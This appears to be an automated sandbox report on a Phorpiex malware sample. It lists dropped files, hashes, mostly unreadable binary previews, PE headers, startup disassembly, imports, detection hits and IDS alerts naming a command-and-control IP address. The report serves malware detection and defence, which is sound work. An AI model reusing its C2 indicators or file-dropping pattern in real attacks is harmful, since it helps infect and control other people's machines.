                                                                                                                                  Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O
                                                                                                                                  Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):85760
                                                                                                                                  Entropy (8bit):7.998087239673687
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:17wFGypBQDLreXJ4xaX8px3nB7C6RfEysfoVE9iGeL8LNoaZb3raWBL:RwrTQTeXJh8z3nBTqjoGeQCaJu0
                                                                                                                                  MD5:20493FD87FE8305516142680D848F1CE
                                                                                                                                  SHA1:8DF2CB6236677885685BA97E328F37CD8F5492D3
                                                                                                                                  SHA-256:FC4A761817120D2DE8B7618833F0EB92410977CF06F4D2A4FB4AF567C40C5DB3
                                                                                                                                  SHA-512:BBBB809C3869B9D28D8CF490B3390B6FD1E6D25DB69BE7FC6EA5ACFA7FF79FB995F43BD113A74BA3FFBFEB32FA3EC0FB971988094EE436DAC283616E3142EC48
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:s..W]...._..|O..Y.W.......q.j*..".n....+.H|\...E..[.E...'..Y|.{e..:.Y..]..u....X..j....R..e.7.~.p)....x~.j..t".u.>N....j.>..k@"....eQ.....oN...;$4....x.nv.....2`A.S.....t.R..)O...........%.S....1.c.Y.....X........u.N....*T..`.X.WV...T..p.f.....+%.{%]P...z.;......z..%.".....V.zgZ..j......I;.bz.....MMb..b5h...m.o.%..!.M..t0x..pg&....v.2..H.oc:..?.W.{6.F........V.....#..m._M...o2..4)O.W#...E..>.....?W......iU.V.#p.{.%.I.}hb.......$..l...m....1s^z'...4..........{..s..px...WP..?.Q.E)......!.......U.........:07.(t....6.0p.wa..h...._4.\N...}...c|]{c.V'.....y.....f.d.C.....I.....:.U.+...Q.."...f...y...O..9....../..f}m.L{Z.O..$E..)..6$......d..tc....?.1....>H...'4U^......<.W..%.....,1%..((........1..8.0...aq.v.....!.k.x..X.-|...M.1.Z.^\.o..qy.q.]....{~.}......D.7K..{..2.a..uO.W....a......[."..E.?...!....DS*.y.S..exPJ.. K.@.~.nZ.H../M..Y......."......t.ZO..|nN.....u..X..\^...s.-[a.[..3K....s.-.@5z...H.|.....{.I ..uU......[...HN.}..A..Zsy0..=i9
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2232
                                                                                                                                  Entropy (8bit):5.379401388151058
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZeUyus:fLHxvIIwLgZ2KRHWLOugos
                                                                                                                                  MD5:8B31787758671196183789E550CE0BD7
                                                                                                                                  SHA1:E42CBA6033293DB707F88FEFA1362042DD8896C1
                                                                                                                                  SHA-256:4667F2971C25BE1476BD553E43FDB7E452768B17670044A4DB1B432C7B8C96AB
                                                                                                                                  SHA-512:74169910DC0EDDA75ECDCFC6AFF2842692F6EFB165935AD6CD849899D373C41A6628D6C6679ADBD89BEF8F73110BF01F14C3FEDBC7C1493A00A6EE159BD76621
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                  Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):110600
                                                                                                                                  Entropy (8bit):7.998486619051527
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                  MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                  SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                  SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                  SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O
                                                                                                                                  Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):110600
                                                                                                                                  Entropy (8bit):7.998486619051527
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                  MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                  SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                  SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                  SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

Process: C:\Users\user\Desktop\Bjl3geiFEK.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 85504
Entropy (8bit): 6.394560338648692
Encrypted: false
SSDEEP: 1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
MD5: 06560B5E92D704395BC6DAE58BC7E794
SHA1: FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
SHA-256: 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
SHA-512: B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\33080.scr, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 82%
Joe Sandbox View:
• Filename: T52Z708x2p.exe, Detection: malicious
• Filename: lJ4EzPSKMj.exe, Detection: malicious
• Filename: Us051y7j25.exe, Detection: malicious
• Filename: thcdVit1dX.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: dgiX55cHyU.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\sysppvrdnvs.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 85504
Entropy (8bit): 6.394560338648692
Encrypted: false
SSDEEP: 1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
MD5: 06560B5E92D704395BC6DAE58BC7E794
SHA1: FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
SHA-256: 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
SHA-512: B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 82%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\sysppvrdnvs.exe
File Type: data
Category: dropped
Size (bytes): 286
Entropy (8bit): 7.369827619940847
Encrypted: false
SSDEEP: 6:JI+cPhYsQuLyuCFmYRhegKv12u5JRn2BtmlFnI0QBIzxN0wi4HvvL:GvhouGFredJcBsjDqIdN0wiQvT
MD5: 3DEA10446B12B8B16638C64ADEE9CF7D
SHA1: 79E5EBA41FFD6D6D0C633E9851FF2BC8B6FCAEA7
SHA-256: E178E70155316BFFABAD28DB3DAF9F60A878243C5F3B8A59E37ADC7664F1A669
SHA-512: 5247BEFA86704AEEB1ED782F025BD9B474E14F6A83E0E2B6DD4DC8800C23788FE2CA770AEBF8F4C0C0B5BE81311A0ABF9385F182FB7D0379094FCDD565B7C56D
Malicious: false
Preview: y..6+....S.i...:g..(.J-j*..x(..K*ec..p....$...:'......u....Y.....pt."..?....2.A.xa.|.Jor....W....Itk..S.R.>.DWE5..c...".3.FC.!o7\......Sl.k........'..l..F.M.......B..b..-..r.....[R..F. z".K..F.8x........l; ....]....Z.. !D.X.L.Y.t..#..k..y.R^o..ve.mOnsU...~o..J..mhd..

Process: C:\Windows\sysppvrdnvs.exe
File Type: data
Category: dropped
Size (bytes): 4096
Entropy (8bit): 4.857793737646147
Encrypted: false
SSDEEP: 96:2gqanIbioTgWZbe7N8vNhsCaQ7u+UJP20vOyngHj6/Twc:2gqBbiyLZbe7NkNhsl+UQfkc6/TV
MD5: 3DA419EFB5200FD83F4E8AD73B944854
SHA1: 7524988CDCAA95D900066FC16634286E7B62A5D0
SHA-256: 08F2912869279FC4AA37994EE4E3366ECA333B2E20CB1EB48D5FA9DF0157E0AF
SHA-512: D179C81A8C69D7553098C59A092CFAA4ED758256B99078F3CC14A72F46BFADF2C52645DB6B7DCD772091BFF336071902B3A7D434068BCA211E9DAE2EB6983F4A
Malicious: false
Preview: ..rYs.PT....s.PT]vc.p.PT....o.PTY+.o.PT....n.PTZ..=m.PT..4.k.PT..[.k.PT...h.PTf...g.PT..|.e.PT.k..d.PT...od.PT.C/.d.PT....d.PT....d.PT..[W.....G.(......[o...._:.....N.G.....Z......%.}B....M_./.....................c.g....U.s.....mJE+....^.D....._8L....._;.f...................[.>..................M.........-X.............E.....Z..............%.............Z...............W..V.....K!*....m.o...._9......Q_._......'(......Pi....V>.........R....^.........l\......0.....%..V....].V......?.......................C.....Z.......Z..B....)e.a.....R.......c......N'.y............Z..7....u.....^..K....U.m.......%......2.......m.....^..........<..................].S.....\.V......x.u....Z..>....\...............................M%....%.q.....%..6......~'.....D.....Z..j....Z..{.....XQ......X......U.h......K_r......<e............#H......]5.......cw....\/.....m.7.....Z..........?....-.|q....[.\.....Z..H..............;.............6........I.............N'.........a.......I....Y.>^....

Process: C:\Users\user\AppData\Local\Temp\33080.scr
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 85504
Entropy (8bit): 6.394560338648692
Encrypted: false
SSDEEP: 1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
MD5: 06560B5E92D704395BC6DAE58BC7E794
SHA1: FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
SHA-256: 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
SHA-512: B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 82%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 5.33877409925911
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Bjl3geiFEK.exe
File size: 10'240 bytes
MD5: ed9fbbbe548c41479cb70e4d694793d0
SHA1: a0bde162d2241ab2acb58544511a41df30a096a7
SHA256: 6fc8b5b8a90cf8ba7e0eb930fcdde776f8eeb3f37913318df7766a365e13fa8e
SHA512: 49652367fec13a1e7a188fd039bf8a9fae6be72fdc31e7597bbcfdf30375277f6a7e09b74bd5a2adf1696cf720998c751b7e1671afa3a59c4dfa7069bca543fb
SSDEEP: 192:Jd94uPG8E1CDSnzmgp+eMwY46BJxT43thW:394u5SCDSnJo+c83
TLSH: 0C222A1EDD4B50A1F3AE0AF087B285DD47FC95031395A0F7FFA298A44F66382B0D2069
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........fW...9...9...9...B...9.......9...8...9.......9.......9.......9.......9.Rich..9.................PE..L...P[.g...................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x401997
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x671F5B50 [Mon Oct 28 09:37:20 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 74ac793950a4fcbef2c9afe64363e7af
Instruction (disassembly at entrypoint):
call 00007FDD04DF4C81h
jmp 00007FDD04DF463Bh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
cmp dword ptr [eax], E06D7363h
jne 00007FDD04DF492Ch
cmp dword ptr [eax+10h], 03h
jne 00007FDD04DF4926h
mov eax, dword ptr [eax+14h]
cmp eax, 19930520h
je 00007FDD04DF4917h
cmp eax, 19930521h
je 00007FDD04DF4910h
cmp eax, 19930522h
je 00007FDD04DF4909h
cmp eax, 01994000h
jne 00007FDD04DF4907h
call 00007FDD04DF4CD6h
xor eax, eax
pop ebp
retn 0004h
push 004019A1h
call dword ptr [0040201Ch]
xor eax, eax
ret
int3
jmp dword ptr [004020B4h]
push 00000014h
push 00402340h
call 00007FDD04DF4B6Dh
push dword ptr [00403384h]
mov esi, dword ptr [00402064h]
call esi
pop ecx
mov dword ptr [ebp-1Ch], eax
cmp eax, FFFFFFFFh
jne 00007FDD04DF490Eh
push dword ptr [ebp+08h]
call dword ptr [004020C0h]
pop ecx
jmp 00007FDD04DF4969h
push 00000008h
call 00007FDD04DF4C97h
pop ecx
and dword ptr [ebp-04h], 00000000h
push dword ptr [00403384h]
call esi
mov dword ptr [ebp-1Ch], eax
push dword ptr [00403380h]
call esi
pop ecx
pop ecx
mov dword ptr [ebp-20h], eax
lea eax, dword ptr [ebp-20h]
push eax
lea eax, dword ptr [ebp-1Ch]
push eax
push dword ptr [ebp+08h]
mov esi, dword ptr [00402078h]
call esi

Programming Language:
• [IMP] VS2005 build 50727
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [C++] VS2008 SP1 build 30729
• [LNK] VS2008 SP1 build 30729
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x237c | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5000 | 0x1c8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x22b8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0xd8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xef4 | 0x1000 | 730fd9b74105a97bf43e80cbec48918b | False | 0.600830078125 | data | 5.964755034376729 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x814 | 0xa00 | 112e404fd7f80bae78b2c35dab689980 | False | 0.424609375 | data | 4.4687440334696635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x38c | 0x200 | 202a0f14ba4a024e6a35d5895669b769 | False | 0.060546875 | data | 0.35275948821577235 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4000 | 0x2b0 | 0x400 | 554d0cedd69e96ee00c8324ce4da604c | False | 0.3623046875 | data | 5.194459669718395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x5000 | 0x220 | 0x400 | 8cbd97ec4739a9330e237d2237460805 | False | 0.4501953125 | data | 3.723355327874369 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4058 | 0x256 | ASCII text, with CRLF line terminators | English | United States | 0.5100334448160535
Imports:
DLL | Import
MSVCR90.dll | ?terminate@@YAXXZ, _unlock, __dllonexit, _lock, __set_app_type, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, _crt_debugger_hook, _encode_pointer, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, mbstowcs, _onexit, rand
KERNEL32.dll | UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, QueryPerformanceCounter, SetUnhandledExceptionFilter, GetStartupInfoA, InterlockedCompareExchange, InterlockedExchange, Sleep, DeleteFileW, MoveFileW, LoadLibraryA, GetProcAddress, GetTickCount, FreeLibrary, IsDebuggerPresent
USER32.dll | FindWindowA, wsprintfW
Language of compilation system | Country where language is spoken
English | United States
Suricata IDS alerts:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-28T11:11:11.839337+0100 | 2837677 | ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 1 | 185.215.113.66 | 80 | 192.168.2.4 | 49731 | TCP
2024-10-28T11:11:12.755493+0100 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | 1 | 185.215.113.66 | 80 | 192.168.2.4 | 49730 | TCP
2024-10-28T11:11:13.063265+0100 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | 1 | 185.215.113.66 | 80 | 192.168.2.4 | 49730 | TCP
2024-10-28T11:11:21.513089+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:21.513089+0100 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49731 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:23.515407+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:23.515407+0100 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:23.546010+0100 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 50345 | 5.239.153.192 | 40500 | UDP
2024-10-28T11:11:23.823677+0100 | 2837677 | ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 1 | 185.215.113.66 | 80 | 192.168.2.4 | 49734 | TCP
